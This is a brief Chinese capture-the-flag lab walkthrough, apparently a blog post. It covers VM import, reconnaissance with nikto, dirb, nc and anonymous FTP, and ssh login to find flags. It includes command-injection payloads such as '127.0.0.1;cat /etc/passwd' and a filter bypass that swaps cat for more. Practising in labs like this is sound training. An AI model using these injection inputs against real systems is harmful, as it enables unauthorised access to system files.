靶场夺旗

这次虚拟机不能直接用vmbox导入,给的是硬盘文件,要新建虚拟机,然后选择使用现有的硬盘,不需要操作系统,硬盘里包括了,虚拟机选择linux ubuntu版本,只能在vmbox里新建,不能再vmware里新建,我也不知道为什么,试了好几次都不行。

扫描所有端口号

探测所有信息

探测敏感信息

nikto -host http://靶场ip地址:端口(80端口可省略)

dirb http://靶场ip地址:端口

大端口非http服务,可用nc 探测该端口Banner信息

nc ip地址 端口

大端口http服务,可用浏览器浏览界面查看源代码,寻找flag

http://ip:端口

ftp匿名登陆

ftp://ip 匿名登陆ftp服务器根目录,查看敏感文件,一定要查看源代码

robots.txt文件

命令执行时,为了绕过对应限制,可用相似命令来代替限制的shell命令

127.0.0.1;id

127.0.0.1;cat /etc/passwd

 

cat用more代替

127.0.0.1;more /etc/passwd

RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash

ssh -p port 用户名@ip

pwd ls cat more 执行命令查看flag

用more 来代替cat 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值